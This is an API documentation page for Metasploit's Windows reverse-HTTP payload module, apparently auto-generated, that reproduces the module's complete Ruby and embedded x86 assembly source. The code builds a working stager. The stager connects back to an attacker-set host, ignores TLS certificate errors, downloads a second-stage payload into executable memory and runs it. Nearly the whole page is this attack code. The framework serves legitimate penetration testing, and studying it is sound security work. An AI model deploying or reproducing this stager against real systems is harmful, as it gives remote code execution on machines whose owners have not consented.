Module: Msf::Payload::Windows::ReverseHttp
- Includes:
- TransportConfig, UUID::Options, Msf::Payload::Windows, BlockApi, Exitfunk
- Included in:
- ReverseHttps, ReverseWinHttp
- Defined in:
- lib/msf/core/payload/windows/reverse_http.rb
Overview
Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
Constant Summary
Constants included from Rex::Payloads::Meterpreter::UriChecksum
Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN
Instance Method Summary collapse
-
#asm_generate_ascii_array(str) ⇒ Object
Convert a string into a NULL-terminated ASCII byte array.
-
#asm_reverse_http(opts = {}) ⇒ Object
Generate an assembly stub with the configured feature set and options.
-
#generate(opts = {}) ⇒ Object
Generate the first stage.
-
#generate_reverse_http(opts = {}) ⇒ Object
Generate and compile the stager.
-
#generate_small_uri ⇒ Object
Generate the URI for the initial stager.
-
#generate_uri(opts = {}) ⇒ Object
Generate the URI for the initial stager.
-
#get_custom_headers(ds) ⇒ Object
Generate the custom headers string.
-
#initialize(*args) ⇒ Object
Register reverse_http specific options.
-
#required_space ⇒ Object
Determine the maximum amount of space required for the features requested.
-
#stage_over_connection? ⇒ Boolean
Do not transmit the stage over the connection.
-
#transport_config(opts = {}) ⇒ Object
Generate the transport-specific configuration.
-
#wfs_delay ⇒ Object
Always wait at least 20 seconds for this payload (due to staging delays).
Methods included from UUID::Options
#generate_payload_uuid, #generate_uri_uuid_mode, #record_payload_uuid, #record_payload_uuid_url
Methods included from Rex::Payloads::Meterpreter::UriChecksum
#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup
Methods included from Exitfunk
Methods included from BlockApi
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from TransportConfig
#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components
Instance Method Details
#asm_generate_ascii_array(str) ⇒ Object
Convert a string into a NULL-terminated ASCII byte array
157 158 159 160 161 162 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 157 def asm_generate_ascii_array(str) (str.to_s + "\x00"). unpack("C*"). map{ |c| "0x%.2x" % c }. join(",") end |
#asm_reverse_http(opts = {}) ⇒ Object
Generate an assembly stub with the configured feature set and options.
181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 181 def asm_reverse_http(opts={}) retry_count = opts[:retry_count].to_i retry_wait = opts[:retry_wait].to_i * 1000 proxy_enabled = !!(opts[:proxy_host].to_s.strip.length > 0) proxy_info = "" if proxy_enabled if opts[:proxy_type].to_s.downcase == "socks" proxy_info << "socks=" else proxy_info << "http://" end proxy_info << opts[:proxy_host].to_s if opts[:proxy_port].to_i > 0 proxy_info << ":#{opts[:proxy_port]}" end end proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) http_open_flags = 0 secure_flags = 0 if opts[:ssl] http_open_flags = ( 0x80000000 | # INTERNET_FLAG_RELOAD 0x04000000 | # INTERNET_NO_CACHE_WRITE 0x00400000 | # INTERNET_FLAG_KEEP_CONNECTION 0x00200000 | # INTERNET_FLAG_NO_AUTO_REDIRECT 0x00080000 | # INTERNET_FLAG_NO_COOKIES 0x00000200 | # INTERNET_FLAG_NO_UI 0x00800000 | # INTERNET_FLAG_SECURE 0x00002000 | # INTERNET_FLAG_IGNORE_CERT_DATE_INVALID 0x00001000 ) # INTERNET_FLAG_IGNORE_CERT_CN_INVALID secure_flags = ( 0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID 0x00001000 | # SECURITY_FLAG_IGNORE_CERT_CN_INVALID 0x00000200 | # SECURITY_FLAG_IGNORE_WRONG_USAGE 0x00000100 | # SECURITY_FLAG_IGNORE_UNKNOWN_CA 0x00000080 ) # SECURITY_FLAG_IGNORE_REVOCATION else http_open_flags = ( 0x80000000 | # INTERNET_FLAG_RELOAD 0x04000000 | # INTERNET_NO_CACHE_WRITE 0x00400000 | # INTERNET_FLAG_KEEP_CONNECTION 0x00200000 | # INTERNET_FLAG_NO_AUTO_REDIRECT 0x00080000 | # INTERNET_FLAG_NO_COOKIES 0x00000200 ) # INTERNET_FLAG_NO_UI end asm = %Q^ ;-----------------------------------------------------------------------------; ; Compatible: Confirmed Windows 8.1, Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000 ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1) ;-----------------------------------------------------------------------------; ; Input: EBP must be the address of 'api_call'. ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) load_wininet: push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments ^ asm << %Q^ internetopen: push ebx ; DWORD dwFlags ^ if proxy_enabled asm << %Q^ push esp ; LPCTSTR lpszProxyBypass ("" = empty string) call get_proxy_server db "#{proxy_info}", 0x00 get_proxy_server: ; LPCTSTR lpszProxyName (via call) push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3) ^ else asm << %Q^ push ebx ; LPCTSTR lpszProxyBypass (NULL) push ebx ; LPCTSTR lpszProxyName (NULL) push ebx ; DWORD dwAccessType (PRECONFIG = 0) ^ end if opts[:ua].nil? asm << %Q^ push ebx ; LPCTSTR lpszAgent (NULL) ^ else asm << %Q^ push ebx ; LPCTSTR lpszProxyBypass (NULL) call get_useragent db "#{opts[:ua]}", 0x00 ; LPCTSTR lpszAgent (via call) get_useragent: ^ end asm << %Q^ push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ asm << %Q^ internetconnect: push ebx ; DWORD_PTR dwContext (NULL) push ebx ; dwFlags push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) push ebx ; password (NULL) push ebx ; username (NULL) push #{opts[:port]} ; PORT call got_server_uri ; double call to get pointer for both server_uri and server_uri: ; server_host; server_uri is saved in EDI for later db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi ^ # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it # doesn't set the Proxy-Authorization header on the CONNECT request. if proxy_enabled && proxy_user asm << %Q^ ; DWORD dwBufferLength (length of username) push #{proxy_user.length} call set_proxy_username proxy_username: db "#{proxy_user}",0x00 set_proxy_username: ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end if proxy_enabled && proxy_pass asm << %Q^ ; DWORD dwBufferLength (length of password) push #{proxy_pass.length} call set_proxy_password proxy_password: db "#{proxy_pass}",0x00 set_proxy_password: ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end asm << %Q^ httpopenrequest: push ebx ; dwContext (NULL) push #{"0x%.8x" % http_open_flags} ; dwFlags push ebx ; accept types push ebx ; referrer push ebx ; version push edi ; server URI push ebx ; method push esi ; hConnection push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ if retry_count > 0 asm << %Q^ ; Store our retry counter in the edi register set_retry: push #{retry_count} pop edi ^ end asm << %Q^ send_request: ^ if opts[:ssl] asm << %Q^ ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); set_security_options: push 0x#{secure_flags.to_s(16)} mov eax, esp push 4 ; sizeof(dwFlags) push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end asm << %Q^ httpsendrequest: push ebx ; lpOptional length (0) push ebx ; lpOptional (NULL) ^ if custom_headers asm << %Q^ push -1 ; dwHeadersLength (assume NULL terminated) call get_req_headers ; lpszHeaders (pointer to the custom headers) db #{custom_headers} get_req_headers: ^ else asm << %Q^ push ebx ; HeadersLength (0) push ebx ; Headers (NULL) ^ end asm << %Q^ push esi ; hHttpRequest push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ if retry_count > 0 asm << %Q^ try_it_again: dec edi jnz send_request ; if we didn't allocate before running out of retries, bail out ^ else asm << %Q^ try_it_again: jmp send_request ; retry forever ^ end if opts[:exitfunk] asm << %Q^ failure: call exitfunk ^ else asm << %Q^ failure: push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end if defined?(read_stage_size?) && read_stage_size? asm << %Q^ allocate_memory: read_stage_size: push ebx ; temporary storage for stage size mov eax, esp ; pointer to 4b buffer for stage size push ebx ; temporary storage for bytesRead mov edi, esp ; pointer to 4b buffer for bytesRead push edi ; &bytesRead push 4 ; bytes to read push eax ; &stage size push esi ; hRequest push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead) pop ebx ; bytesRead (unused, pop for cleaning) pop ebx ; stage size test eax,eax ; download failed? (optional?) jz failure xor eax, eax push 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push ebx ; Stage allocation push eax ; NULL as we dont care where the allocation is push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: xchg eax, ebx ; place the allocated base address in ebx push ebx ; store a copy of the stage base address on the stack (for ret later) push ebx ; temporary storage for bytes read count mov edi, esp ; &bytesRead download_more: push edi ; &bytesRead push eax ; read length push ebx ; buffer push esi ; hRequest push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) jz failure pop eax ; clear the temporary storage for bytesread ^ else asm << %Q^ allocate_memory: push 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: xchg eax, ebx ; place the allocated base address in ebx push ebx ; store a copy of the stage base address on the stack push ebx ; temporary storage for bytes read count mov edi, esp ; &bytesRead download_more: push edi ; &bytesRead push 8192 ; read length push ebx ; buffer push esi ; hRequest push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) jz failure mov eax, [edi] add ebx, eax ; buffer += bytes_received test eax,eax ; optional? jnz download_more ; continue until it returns 0 pop eax ; clear the temporary storage ^ end asm << %Q^ execute_stage: ret ; dive into the stored stage address got_server_uri: pop edi call got_server_host server_host: db "#{opts[:host]}", 0x00 ^ if opts[:exitfunk] asm << asm_exitfunk(opts) end asm end |
#generate(opts = {}) ⇒ Object
Generate the first stage
35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 35 def generate(opts={}) ds = opts[:datastore] || datastore conf = { ssl: opts[:ssl] || false, host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], retry_wait: ds['StagerRetryWait'] } # Add extra options if we have enough space if self.available_space.nil? || (cached_size && required_space <= self.available_space) conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] conf[:ua] = ds['HttpUserAgent'] conf[:proxy_host] = ds['HttpProxyHost'] conf[:proxy_port] = ds['HttpProxyPort'] conf[:proxy_user] = ds['HttpProxyUser'] conf[:proxy_pass] = ds['HttpProxyPass'] conf[:proxy_type] = ds['HttpProxyType'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri end generate_reverse_http(conf) end |
#generate_reverse_http(opts = {}) ⇒ Object
Generate and compile the stager
83 84 85 86 87 88 89 90 91 92 93 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 83 def generate_reverse_http(opts={}) combined_asm = %Q^ cld ; Clear the direction flag. call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start: pop ebp #{asm_reverse_http(opts)} ^ Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string end |
#generate_small_uri ⇒ Object
Generate the URI for the initial stager
124 125 126 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 124 def generate_small_uri generate_uri_uuid_mode(:init_native, 30) end |
#generate_uri(opts = {}) ⇒ Object
Generate the URI for the initial stager
105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 105 def generate_uri(opts={}) ds = opts[:datastore] || datastore uri_req_len = ds['StagerURILength'].to_i # Choose a random URI length between 30 and 255 bytes if uri_req_len == 0 uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length)) end if uri_req_len < 5 raise ArgumentError, "Minimum StagerURILength is 5" end generate_uri_uuid_mode(:init_native, uri_req_len) end |
#get_custom_headers(ds) ⇒ Object
Generate the custom headers string
67 68 69 70 71 72 73 74 75 76 77 78 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 67 def get_custom_headers(ds) headers = "" headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers else nil end end |
#initialize(*args) ⇒ Object
Register reverse_http specific options
22 23 24 25 26 27 28 29 30 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 22 def initialize(*args) super ( [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + Msf::Opt:: + Msf::Opt:: + Msf::Opt:: ) end |
#required_space ⇒ Object
Determine the maximum amount of space required for the features requested
131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 131 def required_space # Start with our cached default generated size space = cached_size # Add 100 bytes for the encoder to have some room space += 100 # Make room for the maximum possible URL length space += 256 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 # Proxy options? space += 200 # Custom headers? Ugh, impossible to tell space += 512 # The final estimated size space end |
#stage_over_connection? ⇒ Boolean
Do not transmit the stage over the connection. We handle this via HTTPS
548 549 550 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 548 def stage_over_connection? false end |
#transport_config(opts = {}) ⇒ Object
Generate the transport-specific configuration
98 99 100 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 98 def transport_config(opts={}) transport_config_reverse_http(opts) end |
#wfs_delay ⇒ Object
Always wait at least 20 seconds for this payload (due to staging delays)
555 556 557 |
# File 'lib/msf/core/payload/windows/reverse_http.rb', line 555 def wfs_delay 20 end |